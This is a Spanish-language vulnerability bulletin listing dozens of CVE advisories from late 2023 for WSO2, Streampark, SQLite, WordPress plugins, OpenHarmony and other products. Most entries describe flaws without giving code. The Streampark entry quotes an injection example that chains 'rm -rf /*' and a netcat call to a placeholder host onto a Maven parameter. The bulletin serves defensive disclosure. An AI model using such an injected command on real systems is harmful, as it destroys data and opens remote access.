Boletín de vulnerabilidades
Vulnerabilidades con productos recientemente documentados:
No hay vulnerabilidades nuevas para los productos a los que está suscrito.
Otras vulnerabilidades de los productos a los que usted está suscrito, y cuya información ha sido actualizada recientemente:
-
Vulnerabilidad en WSO2 (CVE-2023-6837)
Severidad: Pendiente de análisis
Fecha de publicación: 15/12/2023
Fecha de última actualización: 05/01/2024
Se han identificado varios productos WSO2 como vulnerables para realizar suplantaciones de usuarios mediante el aprovisionamiento JIT. Para que esta vulnerabilidad tenga algún impacto en su implementación, se deben cumplir las siguientes condiciones: * Un IDP configurado para autenticación federada y aprovisionamiento JIT habilitado con la opción "Solicitar nombre de usuario, contraseña y consentimiento". * Un proveedor de servicios que utiliza el IDP anterior para la autenticación federada y tiene habilitada la opción "Afirmar identidad utilizando un identificador de sujeto local asignado". El atacante debe tener: * Una cuenta de usuario nueva y válida en el IDP federado que no se haya utilizado anteriormente. * Conocimiento del nombre de usuario de un usuario válido en el IDP local. Cuando se cumplen todas las condiciones previas, un actor malintencionado podría utilizar el flujo de aprovisionamiento JIT para realizar la suplantación de usuario.
-
Vulnerabilidad en Streampark (CVE-2023-49898)
Severidad: Pendiente de análisis
Fecha de publicación: 15/12/2023
Fecha de última actualización: 05/01/2024
En Streampark, hay un módulo de proyecto que integra las capacidades de compilación de Maven. Sin embargo, no hay verificación de los parámetros de compilación de Maven. Permitir a los atacantes insertar comandos para la ejecución remota de comandos. El requisito previo para un ataque exitoso es que el usuario debe iniciar sesión en el sistema Streampark y tener permisos a nivel del sistema. Generalmente, sólo los usuarios de ese sistema tienen autorización para iniciar sesión y los usuarios no ingresarían manualmente un comando de operación peligroso. Por tanto, el nivel de riesgo de esta vulnerabilidad es muy bajo. Mitigación: todos los usuarios deben actualizar a 2.1.2 Ejemplo: ## Puede personalizar el método de empalme según la situación de compilación del proyecto, los resultados de compilación de mvn usan &&, los errores de compilación usan "||" or "&&": /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &
-
Vulnerabilidad en Gallagher Command Center (CVE-2023-23570)
Severidad: Pendiente de análisis
Fecha de publicación: 18/12/2023
Fecha de última actualización: 05/01/2024
La aplicación de seguridad del lado del servidor para el servidor Command Center por parte del cliente podría omitirse y dar lugar a una configuración no válida con un comportamiento indefinido. Este problema afecta: Gallagher Command Center 8.90 anterior a vEL8.90.1620 (MR2), todas las versiones 8.80 y anteriores.
-
Vulnerabilidad en Gallagher Command Center (CVE-2023-23576)
Severidad: Pendiente de análisis
Fecha de publicación: 18/12/2023
Fecha de última actualización: 05/01/2024
El orden de comportamiento incorrecto en Command Center Server podría permitir que los usuarios privilegiados obtengan acceso físico al sitio durante más tiempo del previsto después de una interrupción de la red cuando se utilizan competencias en la decisión de acceso. Este problema afecta a: Gallagher Command Center: 8.90 anterior a vEL8.90.1620 (MR2), 8.80 anterior a vEL8.80.1369 (MR3), 8.70 anterior a vEL8.70.2375 (MR5), 8.60 anterior a vEL8.60.2550 (MR7), todas las versiones de 8.50 y anteriores.
-
Vulnerabilidad en Poly CCX 400, CCX 600, Trio 8800 y Trio C60 (CVE-2023-4463)
Severidad: MEDIA
Fecha de publicación: 29/12/2023
Fecha de última actualización: 05/01/2024
Una vulnerabilidad fue encontrada en Poly CCX 400, CCX 600, Trio 8800 y Trio C60 y clasificada como problemática. Código desconocido del componente HTTP Header Handler es afectado por esta vulnerabilidad. La manipulación del argumento Cookie conduce a la denegación de servicio. El ataque se puede iniciar de forma remota. La explotación ha sido divulgada al público y puede utilizarse. El identificador de esta vulnerabilidad es VDB-249256.
-
Vulnerabilidad en SQLite SQLite3 (CVE-2023-7104)
Severidad: MEDIA
Fecha de publicación: 29/12/2023
Fecha de última actualización: 05/01/2024
Una vulnerabilidad fue encontrada en SQLite SQLite3 hasta 3.43.0 y clasificada como crítica. Este problema afecta la función sessionReadRecord del archivo ext/session/sqlite3session.c del componente make alltest Handler. La manipulación conduce a un desbordamiento de búfer de almacenamiento dinámico. Se recomienda aplicar un parche para solucionar este problema. El identificador asociado de esta vulnerabilidad es VDB-248999.
-
Vulnerabilidad en CodexThemes TheGem - Creative Multi-Purpose & WooCommerce WordPress Theme (CVE-2023-50892)
Severidad: Pendiente de análisis
Fecha de publicación: 29/12/2023
Fecha de última actualización: 05/01/2024
La neutralización incorrecta de la entrada durante la generación de páginas web ('Cross-site Scripting') en CodexThemes TheGem - Creative Multi-Purpose & WooCommerce WordPress Theme permite XSS reflejado. Este problema afecta a TheGem - Creative Multi-Purpose & WooCommerce WordPress Theme: desde n/ a hasta 5.9.1.
-
Vulnerabilidad en Python de Visual Studio Code (CVE-2020-17163)
Severidad: Pendiente de análisis
Fecha de publicación: 29/12/2023
Fecha de última actualización: 05/01/2024
Vulnerabilidad de ejecución remota de código en la extensión Python de Visual Studio Code
-
Vulnerabilidad en Misskey (CVE-2023-52139)
Severidad: Pendiente de análisis
Fecha de publicación: 29/12/2023
Fecha de última actualización: 05/01/2024
Misskey es una plataforma de redes sociales descentralizada y de código abierto. Es posible que las aplicaciones de terceros puedan acceder a algunos endpoints o API de Websocket que están especificados incorrectamente como [kind] (https://github.com/misskey-dev/misskey/blob/406b4bdbe79b5b0b68fcdcb3c4b6e419460a0258/packages/backend/src/server/api/endpoints.ts#L811) o [secure](https://github.com/misskey-dev/misskey/blob/406b4bdbe79b5b0b68fcdcb3c4b6e419460a0258/packages/backend/src/server/api/endpoints.ts#L805) sin el permiso del usuario y realizar operaciones como leer o agregar contenido no público. Como resultado, si el usuario que autenticó la aplicación es un administrador, se filtrará información confidencial como claves secretas de almacenamiento de objetos y contraseñas del servidor SMTP, y los usuarios generales también pueden crear códigos de invitación sin permiso y filtrar información de usuario no pública. Esto está parcheado en la versión [2023.12.1] (https://github.com/misskey-dev/misskey/commit/c96bc36fedc804dc840ea791a9355d7df0748e64).
-
Vulnerabilidad en Novel-Plus (CVE-2023-7171)
Severidad: BAJA
Fecha de publicación: 29/12/2023
Fecha de última actualización: 05/01/2024
Se encontró una vulnerabilidad en Novel-Plus hasta 4.2.0. Ha sido declarada problemática. Una función desconocida del archivo novel-admin/src/main/java/com/java2nb/novel/controller/FriendLinkController.java del componente Friendly Link Handler es afectada por esta vulnerabilidad. La manipulación conduce a cross site scripting. El ataque se puede lanzar de forma remota. La explotación ha sido divulgada al público y puede utilizarse. El parche se llama d6093d8182362422370d7eaf6c53afde9ee45215. Se recomienda aplicar un parche para solucionar este problema. El identificador asociado de esta vulnerabilidad es VDB-249307.
-
Vulnerabilidad en PHPGurukul Small CRM 3.0 (CVE-2023-50035)
Severidad: Pendiente de análisis
Fecha de publicación: 29/12/2023
Fecha de última actualización: 05/01/2024
PHPGurukul Small CRM 3.0 es vulnerable a la inyección SQL en el panel de inicio de sesión de los usuarios debido a que el parámetro "password" se usa directamente en la consulta SQL sin ninguna sanitización y sin que se ejecute el payload de la inyección SQL.
-
Vulnerabilidad en Sourcecodester Customer Support System 1.0 (CVE-2023-50070)
Severidad: Pendiente de análisis
Fecha de publicación: 29/12/2023
Fecha de última actualización: 05/01/2024
Sourcecodester Customer Support System 1.0 tiene múltiples vulnerabilidades de inyección SQL en /customer_support/ajax.php?action=save_ticket a través de department_id, customer_id y subject.
-
Vulnerabilidad en Sourcecodester Customer Support System 1.0 (CVE-2023-50071)
Severidad: Pendiente de análisis
Fecha de publicación: 29/12/2023
Fecha de última actualización: 05/01/2024
Sourcecodester Customer Support System 1.0 tiene múltiples vulnerabilidades de inyección SQL en /customer_support/ajax.php?action=save_department mediante id o name.
-
Vulnerabilidad en SCONE (CVE-2022-46487)
Severidad: Pendiente de análisis
Fecha de publicación: 30/12/2023
Fecha de última actualización: 05/01/2024
La inicialización incorrecta de los registros de configuración de punto flotante x87 y SSE en el componente __scone_entry de SCONE anterior a 5.8.0 para Intel SGX permite a un atacante local comprometer la integridad de ejecución de operaciones de punto flotante en un enclave o acceder a información confidencial a través del análisis de canal lateral.
-
Vulnerabilidad en Muyun DedeBIZ (CVE-2023-7181)
Severidad: MEDIA
Fecha de publicación: 30/12/2023
Fecha de última actualización: 05/01/2024
Una vulnerabilidad fue encontrada en Muyun DedeBIZ hasta 6.2.12 y clasificada como crítica. Una función desconocida del componente Add Attachment Handler es afectada por esta vulnerabilidad. La manipulación conduce a una carga sin restricciones. El ataque puede lanzarse de forma remota. La explotación ha sido divulgada al público y puede utilizarse. El identificador de esta vulnerabilidad es VDB-249368. NOTA: Se contactó primeramente al proveedor sobre esta divulgación, pero no respondió de ninguna forma.
-
Vulnerabilidad en beesblog (CVE-2023-52264)
Severidad: Pendiente de análisis
Fecha de publicación: 30/12/2023
Fecha de última actualización: 05/01/2024
El componente beesblog (también conocido como Bees Blog) anterior a 1.6.2 para thirty bees permite XSS reflejado porque controllers/front/post.php Sharing_url no se maneja correctamente.
-
Vulnerabilidad en Tencent tdsqlpcloud (CVE-2023-52286)
Severidad: Pendiente de análisis
Fecha de publicación: 31/12/2023
Fecha de última actualización: 05/01/2024
Tencent tdsqlpcloud hasta 1.8.5 permite a atacantes remotos no autenticados descubrir credenciales de bases de datos mediante una solicitud index.php/api/install/get_db_info, un problema relacionado con CVE-2023-42387.
-
Vulnerabilidad en code-projects College Notes Gallery 2.0 (CVE-2023-7130)
Severidad: MEDIA
Fecha de publicación: 31/12/2023
Fecha de última actualización: 05/01/2024
Una vulnerabilidad ha sido encontrada en code-projects College Notes Gallery 2.0 y clasificada como crítica. Una función desconocida del archivo login.php es afectada por esta vulnerabilidad. La manipulación del argumento user conduce a la inyección SQL. La explotación ha sido divulgada al público y puede utilizarse. A esta vulnerabilidad se le asignó el identificador VDB-249133.
-
Vulnerabilidad en Crocoblock JetElements For Elementor (CVE-2023-39157)
Severidad: Pendiente de análisis
Fecha de publicación: 31/12/2023
Fecha de última actualización: 05/01/2024
Vulnerabilidad de control inadecuado de generación de código ("inyección de código") en Crocoblock JetElements For Elementor. Este problema afecta a JetElements for Elementor: desde n/a hasta 2.6.10.
-
Vulnerabilidad en Presslabs Theme (CVE-2023-52181)
Severidad: Pendiente de análisis
Fecha de publicación: 31/12/2023
Fecha de última actualización: 05/01/2024
Vulnerabilidad de deserialización de datos no confiables en Presslabs Tema por usuario. Este problema afecta al Tema por usuario: desde n/a hasta 1.0.1.
-
Vulnerabilidad en ARI Soft ARI Stream Quiz – WordPress Quizzes Builder (CVE-2023-52182)
Severidad: Pendiente de análisis
Fecha de publicación: 31/12/2023
Fecha de última actualización: 05/01/2024
Vulnerabilidad de deserialización de datos no confiables en ARI Soft ARI Stream Quiz – WordPress Quizzes Builder. Este problema afecta a ARI Stream Quiz – WordPress Quizzes Builder: desde n/a hasta 1.3.0.
-
Vulnerabilidad en 7-card Fakabao (CVE-2023-7183)
Severidad: MEDIA
Fecha de publicación: 31/12/2023
Fecha de última actualización: 05/01/2024
Una vulnerabilidad ha sido encontrada en 7-card Fakabao hasta 1.0_build20230805 y clasificada como crítica. Una función desconocida del archivo shop/alipay_notify.php es afectada por esta vulnerabilidad. La manipulación del argumento out_trade_no conduce a la inyección SQL. La explotación ha sido divulgada al público y puede utilizarse. A esta vulnerabilidad se le asignó el identificador VDB-249385. NOTA: Se contactó primeramente al proveedor sobre esta divulgación, pero no respondió de nignuna forma.
-
Vulnerabilidad en 7-card Fakabao (CVE-2023-7184)
Severidad: MEDIA
Fecha de publicación: 31/12/2023
Fecha de última actualización: 05/01/2024
Una vulnerabilidad fue encontrada en 7-card Fakabao hasta 1.0_build20230805 y clasificada como crítica. Una función desconocida del archivo shop/notify.php es afectada por esta vulnerabilidad. La manipulación del argumento out_trade_no conduce a la inyección SQL. La explotación ha sido divulgada al público y puede utilizarse. VDB-249386 es el identificador asignado a esta vulnerabilidad. NOTA: Se contactó primeramente al proveedor sobre esta divulgación, pero no respondió de nignuna forma.
-
Vulnerabilidad en 7-card Fakabao (CVE-2023-7185)
Severidad: MEDIA
Fecha de publicación: 31/12/2023
Fecha de última actualización: 05/01/2024
Se encontró una vulnerabilidad en 7-card Fakabao hasta 1.0_build20230805. Ha sido clasificada como crítica. Esto afecta a una parte desconocida del archivo shop/wxpay_notify.php. La manipulación del argumento out_trade_no conduce a la inyección SQL. La explotación ha sido divulgada al público y puede utilizarse. El identificador asociado de esta vulnerabilidad es VDB-249387. NOTA: Se contactó primeramente al proveedor sobre esta divulgación, pero no respondió de nignuna forma.
-
Vulnerabilidad en 7-card Fakabao (CVE-2023-7186)
Severidad: MEDIA
Fecha de publicación: 31/12/2023
Fecha de última actualización: 05/01/2024
Se encontró una vulnerabilidad en 7-card Fakabao hasta 1.0_build20230805. Ha sido declarada crítica. Esta vulnerabilidad afecta a código desconocido del archivo member/notify.php. La manipulación del argumento out_trade_no conduce a la inyección SQL. La explotación ha sido divulgada al público y puede utilizarse. El identificador de esta vulnerabilidad es VDB-249388. NOTA: Se contactó primeramente al proveedor sobre esta divulgación, pero no respondió de nignuna forma.
-
Vulnerabilidad en Totolink N350RT 9.3.5u.6139_B20201216 (CVE-2023-7187)
Severidad: MEDIA
Fecha de publicación: 31/12/2023
Fecha de última actualización: 05/01/2024
Se encontró una vulnerabilidad en Totolink N350RT 9.3.5u.6139_B20201216. Ha sido calificada como crítica. Este problema afecta un procesamiento desconocido del archivo /cgi-bin/cstecgi.cgi?action=login&flag=ie8 del componente HTTP POST Request Handler. La manipulación conduce a un desbordamiento de búfer en la región stack de la memoria. La explotación ha sido divulgada al público y puede utilizarse. A esta vulnerabilidad se le asignó el identificador VDB-249389. NOTA: Se contactó primeramente al proveedor sobre esta divulgación, pero no respondió de ninguna forma.
-
Vulnerabilidad en Shipping 100 Fahuo100 (CVE-2023-7188)
Severidad: MEDIA
Fecha de publicación: 31/12/2023
Fecha de última actualización: 05/01/2024
Una vulnerabilidad ha sido encontrada en Shipping 100 Fahuo100 hasta 1.1 y clasificada como crítica. Una función desconocida del archivo member/login.php es afectada por esta vulnerabilidad. La manipulación del argumento M_pwd conduce a la inyección de SQL. La complejidad de un ataque es bastante alta. Se dice que la explotabilidad es difícil. La explotación ha sido divulgada al público y puede utilizarse. VDB-249390 es el identificador asignado a esta vulnerabilidad. NOTA: Se contactó primeramente al proveedor sobre esta divulgación, pero no respondió de ninguna forma.
-
Vulnerabilidad en S-CMS (CVE-2023-7189)
Severidad: MEDIA
Fecha de publicación: 31/12/2023
Fecha de última actualización: 05/01/2024
Una vulnerabilidad fue encontrada en S-CMS hasta 2.0_build20220529-20231006 y clasificada como crítica. Una función desconocida del archivo /s/index.php?action=statistics es afectada por esta vulnerabilidad. La manipulación del argumento lid conduce a la inyección de SQL. La explotación ha sido divulgada al público y puede utilizarse. El identificador asociado de esta vulnerabilidad es VDB-249391. NOTA: Se contactó primeramente al proveedor sobre esta divulgación, pero no respondió de nignuna forma.
-
Vulnerabilidad en S-CMS (CVE-2023-7190)
Severidad: MEDIA
Fecha de publicación: 31/12/2023
Fecha de última actualización: 05/01/2024
Una vulnerabilidad fue encontrada en S-CMS hasta 2.0_build20220529-20231006 y clasificada como crítica. Una función desconocida del archivo /member/ad.php?action=ad es afectada por esta vulnerabilidad. La manipulación del argumento A_text/A_url/A_contact conduce a la inyección de SQL. La explotación ha sido divulgada al público y puede utilizarse. El identificador de esta vulnerabilidad es VDB-249392. NOTA: Se contactó primeramente al proveedor sobre esta divulgación, pero no respondió de ninguna forma.
-
Vulnerabilidad en S-CMS (CVE-2023-7191)
Severidad: MEDIA
Fecha de publicación: 31/12/2023
Fecha de última actualización: 05/01/2024
Una vulnerabilidad fue encontrada en S-CMS hasta 2.0_build20220529-20231006 y clasificada como crítica. Una parte desconocida del archivo member/reg.php afecta a esta vulnerabilidad. La manipulación del argumento M_login/M_email conduce a la inyección de SQL. La explotación ha sido divulgada al público y puede utilizarse. A esta vulnerabilidad se le asignó el identificador VDB-249393. NOTA: Se contactó primeramente al proveedor sobre esta divulgación, pero no respondió de ninguna forma.
-
Vulnerabilidad en Eyal Fitoussi GEO my WordPress (CVE-2023-52134)
Severidad: Pendiente de análisis
Fecha de publicación: 31/12/2023
Fecha de última actualización: 05/01/2024
Neutralización incorrecta de elementos especiales utilizados en una vulnerabilidad de comando SQL ('inyección SQL') en Eyal Fitoussi GEO my WordPress. Este problema afecta a GEO my WordPress: desde n/a hasta 4.0.2.
-
Vulnerabilidad en Everestthemes Everest Backup – WordPress Cloud Backup, Migration, Restore & Cloning Plugin (CVE-2023-52185)
Severidad: Pendiente de análisis
Fecha de publicación: 31/12/2023
Fecha de última actualización: 05/01/2024
Vulnerabilidad de exposición de información confidencial a un actor no autorizado en Everestthemes Everest Backup – WordPress Cloud Backup, Migration, Restore & Cloning Plugin. Este problema afecta a Everest Backup – WordPress Cloud Backup, Migration, Restore & Cloning Plugin: desde n/a hasta 2.1.9 .
-
Vulnerabilidad en MTab Bookmark (CVE-2023-7193)
Severidad: MEDIA
Fecha de publicación: 31/12/2023
Fecha de última actualización: 05/01/2024
Una vulnerabilidad fue encontrada en MTab Bookmark hasta 1.2.6 y clasificada como crítica. Este problema afecta un procesamiento desconocido del archivo public/install.php del componente Installation. La manipulación conduce a controles de acceso inadecuados. La complejidad de un ataque es bastante alta. Se sabe que la explotación es difícil. La explotación ha sido divulgada al público y puede utilizarse. El identificador asociado de esta vulnerabilidad es VDB-249395. NOTA: Se contactó primeramente al proveedor sobre esta divulgación, pero no respondió de ninguna forma.
-
Vulnerabilidad en Saleswonder Team Webinar Plugin: Create live/evergreen/automated/instant webinars, stream & Zoom Meetings | WebinarIgnition (CVE-2023-51423)
Severidad: Pendiente de análisis
Fecha de publicación: 31/12/2023
Fecha de última actualización: 05/01/2024
Neutralización incorrecta de elementos especiales utilizados en una vulnerabilidad de comando SQL ('inyección SQL') en Saleswonder Team Webinar Plugin: Create live/evergreen/automated/instant webinars, stream & Zoom Meetings | WebinarIgnition. Este problema afecta a Webinar Plugin: Create live/evergreen/automated/instant webinars, stream & Zoom Meetings | WebinarIgnition: desde n/a hasta 3.05.0.
-
Vulnerabilidad en Mestres do WP Checkout Mestres WP (CVE-2023-51469)
Severidad: Pendiente de análisis
Fecha de publicación: 31/12/2023
Fecha de última actualización: 05/01/2024
Neutralización incorrecta de elementos especiales utilizados en una vulnerabilidad de comando SQL ('inyección SQL') en Mestres do WP Checkout Mestres WP. Este problema afecta a Checkout Mestres WP: desde n/a hasta 7.1.9.6.
-
Vulnerabilidad en Automattic WooPayments – Fully Integrated Solution Built and Supported by Woo (CVE-2023-51503)
Severidad: Pendiente de análisis
Fecha de publicación: 31/12/2023
Fecha de última actualización: 05/01/2024
Vulnerabilidad de omisión de autorización a través de clave controlada por el usuario en Automattic WooPayments – Fully Integrated Solution Built and Supported by Woo. Este problema afecta a WooPayments – Fully Integrated Solution Built and Supported by Woo: desde n/a hasta 6.9.2.
-
Vulnerabilidad en WPManageNinja LLC Fluent Support – WordPress Helpdesk and Customer Support Ticket Plugin (CVE-2023-51547)
Severidad: Pendiente de análisis
Fecha de publicación: 31/12/2023
Fecha de última actualización: 05/01/2024
Neutralización incorrecta de elementos especiales utilizados en una vulnerabilidad de comando SQL ('inyección SQL') en WPManageNinja LLC Fluent Support – WordPress Helpdesk and Customer Support Ticket Plugin. Este problema afecta a Fluent Support – WordPress Helpdesk and Customer Support Ticket Plugin: desde n/a hasta 1.7.6.
-
Vulnerabilidad en WP Zinc Page Generator (CVE-2023-52131)
Severidad: Pendiente de análisis
Fecha de publicación: 31/12/2023
Fecha de última actualización: 05/01/2024
Neutralización incorrecta de elementos especiales utilizados en una vulnerabilidad de comando SQL ("Inyección SQL") en WP Zinc Page Generator. Este problema afecta a Page Generator: desde n/a hasta 1.7.1.
-
Vulnerabilidad en Jewel Theme WP Adminify (CVE-2023-52132)
Severidad: Pendiente de análisis
Fecha de publicación: 31/12/2023
Fecha de última actualización: 05/01/2024
Neutralización incorrecta de elementos especiales utilizados en una vulnerabilidad de comando SQL ('inyección SQL') en Jewel Theme WP Adminify. Este problema afecta a WP Adminify: desde n/a hasta 3.1.6.
-
Vulnerabilidad en WhileTrue Most And Least Read Posts Widget (CVE-2023-52133)
Severidad: Pendiente de análisis
Fecha de publicación: 31/12/2023
Fecha de última actualización: 05/01/2024
Neutralización incorrecta de elementos especiales utilizados en una vulnerabilidad de comando SQL ('Inyección SQL') en WhileTrue Most And Least Read Posts Widget. Este problema afecta a Most And Least Read Posts Widget: desde n/a hasta 2.5.16.
-
Vulnerabilidad en OpenHarmony v3.2.2 (CVE-2023-47216)
Severidad: Pendiente de análisis
Fecha de publicación: 02/01/2024
Fecha de última actualización: 05/01/2024
En OpenHarmony v3.2.2 y versiones anteriores permiten que un atacante local haga que DOS ocupe todos los recursos
-
Vulnerabilidad en OpenHarmony v3.2.2 (CVE-2023-47857)
Severidad: Pendiente de análisis
Fecha de publicación: 02/01/2024
Fecha de última actualización: 05/01/2024
En OpenHarmony v3.2.2 y versiones anteriores permiten que un atacante local provoque el bloqueo de la cámara multimedia modificando un puntero liberado.
-
Vulnerabilidad en OpenHarmony v3.2.2 (CVE-2023-48360)
Severidad: Pendiente de análisis
Fecha de publicación: 02/01/2024
Fecha de última actualización: 05/01/2024
En OpenHarmony v3.2.2 y versiones anteriores permiten que un atacante local provoque la caída del reproductor multimedia modificando un puntero liberado.
-
Vulnerabilidad en OpenHarmony v3.2.2 (CVE-2023-49135)
Severidad: Pendiente de análisis
Fecha de publicación: 02/01/2024
Fecha de última actualización: 05/01/2024
En OpenHarmony v3.2.2 y versiones anteriores permiten que un atacante local provoque la caída del reproductor multimedia modificando un puntero liberado.
-
Vulnerabilidad en OpenHarmony v3.2.2 (CVE-2023-49142)
Severidad: Pendiente de análisis
Fecha de publicación: 02/01/2024
Fecha de última actualización: 05/01/2024
En OpenHarmony v3.2.2 y versiones anteriores permiten que un atacante local provoque una falla del audio multimedia al modificar un puntero liberado.